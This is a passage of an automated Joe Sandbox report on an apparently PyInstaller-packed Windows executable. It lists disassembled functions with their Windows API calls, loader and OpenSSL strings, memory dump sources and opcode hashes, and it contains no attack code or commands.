                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                          • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                          • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                          • Opcode ID: 6fbdb188916104b0c2c5940302cfd80688c9116ecc918f500a0c860990a20752
                                                                                                                                                                                                                                          • Instruction ID: d0e97c873fbb4cc8c1bab014d2b7e853b1dfa67cc1ac6b105376c7bf38949823
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6fbdb188916104b0c2c5940302cfd80688c9116ecc918f500a0c860990a20752
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C451D723A3D68285FB50BB24E8516BA6360EFD4784F544075E50EC66F5EE2CE505F740
                                                                                                                                                                                                                                          Function 00007FF67AED2180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                          • String ID: P%
                                                                                                                                                                                                                                          • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                          • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                          • Instruction ID: a011452b26be41af9b5d829c9c31bdf55d01aef9534cbb0a8b0f9f6a792587c8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5751C637614BA186D6249F26F4181BAB7A1F798B61F004125EBDE83694EF3CD085DB10
                                                                                                                                                                                                                                          Function 00007FF8A8632700 Relevance: 16.7, APIs: 11, Instructions: 230COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3002205748.00007FF8A8631000.00000040.00000001.01000000.0000001A.sdmp, Offset: 00007FF8A8630000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002160686.00007FF8A8630000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002205748.00007FF8A8694000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002205748.00007FF8A86E3000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002205748.00007FF8A873C000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002205748.00007FF8A8741000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002205748.00007FF8A8744000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002828639.00007FF8A8745000.00000080.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002876682.00007FF8A8747000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff8a8630000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 349153199-0
                                                                                                                                                                                                                                          • Opcode ID: 1738fc931c46e0016abe01128f6c04fa9ae34eb026bf82ed76cd7c7c3c76c679
                                                                                                                                                                                                                                          • Instruction ID: b0d0faf367a404e344fffb3a77c0af06a984e134fcef86d2c03a5b1988caee03
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1738fc931c46e0016abe01128f6c04fa9ae34eb026bf82ed76cd7c7c3c76c679
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3581D561E0F243B6FA509B66A8492792291FF457C2F14B039DA6C57396DF3CE8458338
                                                                                                                                                                                                                                          Function 00007FF67AEE6300 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: -$:$f$p$p
                                                                                                                                                                                                                                          • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                          • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                          • Instruction ID: dd4dde16f49b3cd1f81474439cfa99d0b263006a46247afb9f0efd89d0bf18e9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3312B373F2C14386FB207B14E1542B97792FB40750F844575E68A876E8DF3DE990AB02
                                                                                                                                                                                                                                          Function 00007FF67AED2C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF67AED3706,?,00007FF67AED3804), ref: 00007FF67AED2C9E
                                                                                                                                                                                                                                          • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF67AED3706,?,00007FF67AED3804), ref: 00007FF67AED2D63
                                                                                                                                                                                                                                          • MessageBoxW.USER32 ref: 00007FF67AED2D99
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                          • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                          • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                          • Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                                          • Instruction ID: b6a4aff4207acfc08c7b17e42b1ccb9ea619be30a6cd658304911a804c79d122
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E31D233B18B4146E620BB25B8102AB66A5BFC8BC8F510136EF8DD3769EE3CD546D700
                                                                                                                                                                                                                                          Function 00007FF67AEEB1C0 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Value$ErrorLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2506987500-0
                                                                                                                                                                                                                                          • Opcode ID: 64d992c46ee3b7395fe78fb810fe312dfe396e54660f00f57cdb80144ae96788
                                                                                                                                                                                                                                          • Instruction ID: b3dafb40df55a1660027b11f7531067e0e2004e04927585f42f1707e75534f3b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 64d992c46ee3b7395fe78fb810fe312dfe396e54660f00f57cdb80144ae96788
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E721A423F3D24682FA547765665113D63425F487B0F4087B8D87EC76FADE2DB800A300
                                                                                                                                                                                                                                          Function 00007FF67AEEB338 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF67AEE4F81,?,?,?,?,00007FF67AEEA4FA,?,?,?,?,00007FF67AEE71FF), ref: 00007FF67AEEB347
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF67AEE4F81,?,?,?,?,00007FF67AEEA4FA,?,?,?,?,00007FF67AEE71FF), ref: 00007FF67AEEB37D
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF67AEE4F81,?,?,?,?,00007FF67AEEA4FA,?,?,?,?,00007FF67AEE71FF), ref: 00007FF67AEEB3AA
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF67AEE4F81,?,?,?,?,00007FF67AEEA4FA,?,?,?,?,00007FF67AEE71FF), ref: 00007FF67AEEB3BB
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF67AEE4F81,?,?,?,?,00007FF67AEEA4FA,?,?,?,?,00007FF67AEE71FF), ref: 00007FF67AEEB3CC
                                                                                                                                                                                                                                          • SetLastError.KERNEL32(?,?,?,00007FF67AEE4F81,?,?,?,?,00007FF67AEEA4FA,?,?,?,?,00007FF67AEE71FF), ref: 00007FF67AEEB3E7
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Value$ErrorLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2506987500-0
                                                                                                                                                                                                                                          • Opcode ID: 508bc4e8de0e80a19cd6daf9ed8871fa40715e6eab000f8b832e18dd1cfec2a0
                                                                                                                                                                                                                                          • Instruction ID: 3ea4bef323f937b941fbc38cf24f40855ece8a63cd2bf493774a51f5250fe4b0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 508bc4e8de0e80a19cd6daf9ed8871fa40715e6eab000f8b832e18dd1cfec2a0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B116023A3C68686FA547721A69213D63429F547B0F5487B4E87EC77F6EF7CA801A301
                                                                                                                                                                                                                                          Function 00007FF8A92FA470 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 181COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3007572245.00007FF8A92E1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FF8A92E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007520980.00007FF8A92E0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9354000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9356000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9379000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9384000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A938E000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007939655.00007FF8A9391000.00000080.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007986367.00007FF8A9393000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff8a92e0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C6113440ErrorLast
                                                                                                                                                                                                                                          • String ID: %s/%s$..\s\ssl\ssl_cert.c$OPENSSL_DIR_read(&ctx, '
                                                                                                                                                                                                                                          • API String ID: 181156767-4291904164
                                                                                                                                                                                                                                          • Opcode ID: 43a2a23570172f1492d2df20069b1eec957ebead7fe1968015ea09c30e310cbe
                                                                                                                                                                                                                                          • Instruction ID: b1d0769b132fef581c79b9a27855d0dac18cf781c9968b90e214ad47086884f8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43a2a23570172f1492d2df20069b1eec957ebead7fe1968015ea09c30e310cbe
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35718561A0EAC2A6FA60AF21D4117BD6270EFC5BC4F416031EA5D87B9EEF3CE4558704
                                                                                                                                                                                                                                          Function 00007FF67AED2390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                          • String ID: Unhandled exception in script
                                                                                                                                                                                                                                          • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                          • Opcode ID: dd10c28d74256616f4f20b34f0e4914686707bcd8d030bd0fddff274f11205b5
                                                                                                                                                                                                                                          • Instruction ID: 1717989dcef1fe0b0ce6d70bb1669abe5fa85ad4e4ca767f3c6169505f7406a5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd10c28d74256616f4f20b34f0e4914686707bcd8d030bd0fddff274f11205b5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E315E73628A8289EB60EB21F8552FA6360FF88784F544175EA4D8BB69DF3CD104D700
                                                                                                                                                                                                                                          Function 00007FF67AED2B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF67AED918F,?,00007FF67AED3C55), ref: 00007FF67AED2BA0
                                                                                                                                                                                                                                          • MessageBoxW.USER32 ref: 00007FF67AED2C2A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                          • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                          • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                          • Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                                          • Instruction ID: 22a8aeda325637f0f7a4286d6e2e49398fc0a6d64678d57fa4b50c052c19b07c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1121AE73B28B8186E751AB64F8447AA63A4EB887C0F404136EA8D97669DE3CD645C740
                                                                                                                                                                                                                                          Function 00007FF8B910A238 Relevance: 7.6, APIs: 5, Instructions: 125encryptionCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3010460517.00007FF8B9101000.00000040.00000001.01000000.00000015.sdmp, Offset: 00007FF8B9100000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3010325096.00007FF8B9100000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3010460517.00007FF8B911E000.00000040.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3010460517.00007FF8B9128000.00000040.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3010843875.00007FF8B912B000.00000080.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3010910842.00007FF8B912D000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff8b9100000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Cert$Store$00007CloseContextEnumErrorFreeLastOpen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 966150261-0
                                                                                                                                                                                                                                          • Opcode ID: 2cdfd983aa13922406d2df9ffe571f540b64cb218aaa8b0ea8088b65d93e4175
                                                                                                                                                                                                                                          • Instruction ID: 7c37d2fc430b815fb899e90aa851a9377d227b734b22ae14243c29f484020ed9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cdfd983aa13922406d2df9ffe571f540b64cb218aaa8b0ea8088b65d93e4175
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38413025F0AB8282EA595F29A91913C33A0FF45BD0F4944B4DB0E4B7B4EF3EE445A310
                                                                                                                                                                                                                                          Function 00007FF67AEF93D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _set_statfp
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1156100317-0
                                                                                                                                                                                                                                          • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                          • Instruction ID: bba2312b7da97a2eedaebef1015a100488629bdeb2adc4f0a40545f3c8225b86
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35118273E7CA1301F6E43528F4963791054EF79364E044ABCFAEE866F68E2C69416D44
                                                                                                                                                                                                                                          Function 00007FF67AEEB400 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FlsGetValue.KERNEL32(?,?,?,00007FF67AEEA613,?,?,00000000,00007FF67AEEA8AE,?,?,?,?,?,00007FF67AEEA83A), ref: 00007FF67AEEB41F
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF67AEEA613,?,?,00000000,00007FF67AEEA8AE,?,?,?,?,?,00007FF67AEEA83A), ref: 00007FF67AEEB43E
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF67AEEA613,?,?,00000000,00007FF67AEEA8AE,?,?,?,?,?,00007FF67AEEA83A), ref: 00007FF67AEEB466
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF67AEEA613,?,?,00000000,00007FF67AEEA8AE,?,?,?,?,?,00007FF67AEEA83A), ref: 00007FF67AEEB477
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF67AEEA613,?,?,00000000,00007FF67AEEA8AE,?,?,?,?,?,00007FF67AEEA83A), ref: 00007FF67AEEB488
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
